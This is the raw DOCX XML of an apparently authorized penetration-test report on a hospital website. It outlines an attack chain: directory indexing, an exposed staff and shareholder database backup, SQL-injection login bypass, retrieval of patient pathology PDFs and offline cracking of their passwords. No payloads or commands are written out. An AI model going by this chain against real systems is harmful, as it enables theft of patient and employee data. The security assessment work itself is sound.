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200"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="17365D"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>MEDIROZA GENERAL HOSPITAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2F5597"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>INDEPENDENT WEB APPLICATION SECURITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="595959"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>&amp; EXPLOITATION CASE STUDY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Prepared by Chandrashekar Bala</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorized black-box external assessment  |  Assessment date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>27 August</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2026  |  Report date: 02 October 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Target: https://medirozahospital.com  |  Classification: CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>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blHeader w:val="true"/>
        </w:trPr>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Project characteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>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Value</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Assessment type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External black-box web application security assessment</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Primary objective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Identify, validate and document exploitable weaknesses and their real impact</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Evidence standard</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Reproducible request/response evidence, screenshots, hashes and command register</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Portfolio positioning</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Independent technical case study derived from an authorized controlled assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This edition is intentionally presented as a standalone security engineering project rather than as a classroom milestone report. The underlying activity was performed under written authorization in a controlled environment; the report focuses on the technical work, evidence quality, attack-chain reasoning, remediation engineering and retest criteria that make the project useful as a professional portfolio artifact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Document Control, Provenance &amp; Handling</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blHeader w:val="true"/>
        </w:trPr>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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>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Value</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Author</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Chandrashekar Bala</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Primary target</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https://medirozahospital.com</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Resolved address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199.188.201.16</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Assessment type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Black-box external web application penetration test</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Authorization</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Written authorization for security testing was provided by the exercise owner</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Assessment date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27 August</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="ＭＳ 明朝" w:cs=""/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2026</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Report version</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="ＭＳ 明朝" w:cs=""/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>.0 — Independent Portfolio Edition</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Classification</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CONFIDENTIAL — restricted technical evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Project provenance: the assessment was originally performed within an authorized Networkwalks controlled environment. This report deliberately removes classroom milestone framing from the main narrative and presents the work as a standalone security assessment and exploitation case study. The authorization boundary remains unchanged: testing was limited to the target domain; no social engineering or denial-of-service activity was performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Handling requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Do not publish the confidential report, recovered document passwords, raw patient PDFs, national identifiers, direct employee contact data or the raw SQL backup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>For public portfolio use, publish only a sanitized version that removes credentials and sensitive personal data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Preserve evidence hashes and the original evidence package when demonstrating reproducibility privately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The report distinguishes confirmed observations from interpretations and explicitly records limitations where a control could not be independently verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Evidence classification</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Class</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Examples</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Handling</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E0 — Public surface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DNS, public HTML, HTTP status, public metadata</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Suitable for narrative evidence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E1 — Technical restricted</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Nmap, Burp captures, error output, SQLi proof</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Restricted technical distribution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E2 — Sensitive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Patient-report artifacts, hashes, decrypted evidence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Confidential; minimum necessary handling</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E3 — Credential/identity</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Recovered passwords, national IDs, direct contact data</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Never publish; restricted appendix only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This assessment identified a connected set of weaknesses that permits an external attacker to move from ordinary web reconnaissance to access to highly sensitive information without privileged network access. The two most consequential paths are independent: an exposed database backup directly disclosed internal staff and shareholder records, while SQL injection in the patient login flow bypassed authentication and enabled retrieval of three confidential pathology-report PDFs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The evidence is unusually strong for a portfolio case study because the assessment does not stop at scanner output. It establishes a baseline request, changes a single input, records the resulting HTTP-state transition, confirms the authenticated portal in a browser, retrieves the referenced files, analyzes their protection, performs offline password recovery, validates the recovered documents and separately retrieves the exposed database backup. The result is a demonstrable end-to-end attack chain rather than a list of theoretical vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Risk at a glance</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="1022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045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="2045"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>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Primary impact</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F-01</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Unauthenticated directory indexing on /old/, /patient/ and /staff/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FFEDD5"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D97706"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>HIGH</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7.5</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enumeration of application files, logs, report paths and backup names.</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F-02</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Unauthenticated internal HR database backup exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEE2E2"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B91C1C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CRITICAL</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9.4*</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 disclosure of 30 staff records and 10 shareholder records.</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F-03</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SQL injection enabling patient-portal authentication bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEE2E2"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B91C1C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CRITICAL</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9.8</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Authentication boundary bypass followed by access to patient reporting functions.</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F-04</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Verbose SQL/database error disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEF3C7"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B45309"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>MEDIUM</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5.3</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Database implementation details disclosed to the remote requester.</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F-05</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Sensitive patient-report retrieval following authentication bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FFEDD5"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D97706"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>HIGH</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8.1*</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Three confidential pathology-report PDFs were retrieved after the auth bypass.</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F-06</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Predictable/disclosed patient-report storage path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="DCFCE7"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15803D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>LOW</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3.1*</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Sequential report identifiers and a disclosed storage path reduce discovery effort.</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F-07</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disclosure of error-log filename/metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEF3C7"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B45309"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>MEDIUM</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5.3*</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Directory indexing reveals an application error log filename and metadata.</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F-08</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Server/hosting fingerprint disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2045" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="DCFCE7"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15803D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>LOW</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3.1*</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Web and hosting-layer fingerprints are externally observable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Executive interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-02 is independently critical because the web server exposes a database backup containing 30 staff records and 10 shareholder records, including national identifiers, contact data, compensation and ownership information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-03 is independently critical because a crafted username value changes an invalid authentication response into an HTTP 302 redirect to the authenticated patient portal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-05 demonstrates downstream patient-data access after the authentication boundary is bypassed. The report intentionally does not label this as a standalone IDOR because cross-patient authorization was not separately tested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-01, F-04, F-06 and F-07 reduce attacker effort or disclose application internals and therefore amplify the critical paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-08 is defense-in-depth only: server and hosting fingerprints were observed, but no specific version-based exploit was established.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:ind w:hanging="0" w:start="360"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The attack chain in one view</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>External reconnaissance → application and restricted directories discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Directory indexing → backup filename, login surface, report storage path and error-log metadata exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Public SQL backup → confidential HR and shareholder data retrieved without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Patient login baseline → normal HTTP 200 authentication failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Single controlled SQL syntax alteration → HTTP 302 redirect to patient portal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Portal HTML → three sequential report download identifiers discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Three encrypted PDFs → retrieved as HTTP 200 application/pdf responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PDF security analysis → legacy Standard handler parameters identified; dictionary-based offline recovery succeeded for all three files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Recovered artifacts → decryption and structural validation completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Why this project is technically distinctive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The project is designed as a security engineering case study rather than a scanner dump. Its distinctive value comes from joining offensive validation with defensive interpretation: every material finding has a reproduction path, evidence boundary, root-cause hypothesis at the level supported by the evidence, remediation guidance, detection opportunities and a concrete retest condition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Skills demonstrated</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blHeader w:val="true"/>
        </w:trPr>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Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>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Demonstrated capability</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Reconnaissance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DNS, WHOIS, HTTP metadata, robots/sitemap analysis, service enumeration and attack-surface mapping</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Web application testing</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Authentication analysis, parameter tampering, SQL injection validation, directory exposure and access-control analysis</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Manual exploitation</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Differential request testing, browser confirmation and controlled retrieval of sensitive objects</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Tool validation</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Burp Suite evidence capture and conservative sqlmap verification with limitations recorded</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Document security</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encryption inspection, hash extraction, offline password recovery and post-decryption integrity validation</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Data analysis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Structured analysis of exposed HR/shareholder records and exact payroll statistics</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Reporting</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CVSS/CWE mapping, evidence matrix, root-cause analysis, remediation and retest design</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Detection engineering</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Concrete log sources and behavioral indicators for SQLi and anomalous portal access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Scope, Authorization &amp; Rules of Engagement</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blHeader w:val="true"/>
        </w:trPr>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>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Value</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In-scope target</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https://medirozahospital.com</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Target IP</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199.188.201.16</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Starting position</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External, unauthenticated</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Testing model</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Black-box</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Exclusions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social engineering; no denial of service; no outside-domain testing</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Data handling</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Minimum necessary acquisition for authorized milestones and evidence preservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Auxiliary services were observed during network enumeration, including FTP, SMTP, DNS, POP3/IMAP and cPanel-related ports. Because the target appears to use shared hosting and the engagement boundary was the web domain, those services are treated as attack-surface observations rather than automatically as vulnerabilities. No independent exploitation of those services is claimed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Methodology &amp; Assessment Workflow</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Phase</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Activities</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Evidence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Reconnaissance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DNS, HTTP, robots.txt, sitemap, WHOIS, certificate and metadata review</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DNS/HTTP outputs, screenshots</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Attack-surface mapping</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pages, restricted directories, login endpoints, portal links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HTML, directory listings, screenshots</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Authentication testing</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Baseline invalid login followed by controlled input mutation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status/redirect differential, Burp evidence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Exploitation validation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Browser confirmation, report enumeration and file retrieval</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Portal screenshots, PDF artifacts</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Cryptographic analysis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metadata, encryption parameters, hash extraction, password recovery</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qpdf output, hashes, crack evidence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Sensitive-data exposure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backup retrieval and structured data analysis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Raw SQL, tables, exact statistics</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Reporting/retest design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Risk classification, root cause, remediation and closure tests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This report and evidence matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Testing philosophy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The methodology prioritized proof over volume. A scanner result alone was not accepted as the final determination when the application could be tested manually. Conversely, the report does not upgrade an automated result into a confirmation when the tool did not independently validate the issue. This is especially important for the SQL injection finding: sqlmap encountered repeated HTTP 403 responses and connection instability, while the manual test produced a reproducible authentication-state change and browser-confirmed access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Reconnaissance &amp; Attack-Surface Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5.1 DNS and hosting identity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The target resolved consistently to 199.188.201.16 through both Cloudflare public resolvers tested in the captured commands. WHOIS data identified NameCheap registration/hosting context, while the service scan exposed a shared-hosting style service set. The hostname responded normally over HTTPS, whereas direct-to-IP requests produced different HTTP behavior; this is treated as routing/SNI/load-balancer behavior, not as a vulnerability by itself.</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blHeader w:val="true"/>
        </w:trPr>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Observation</w:t>
            </w:r>
          </w:p>
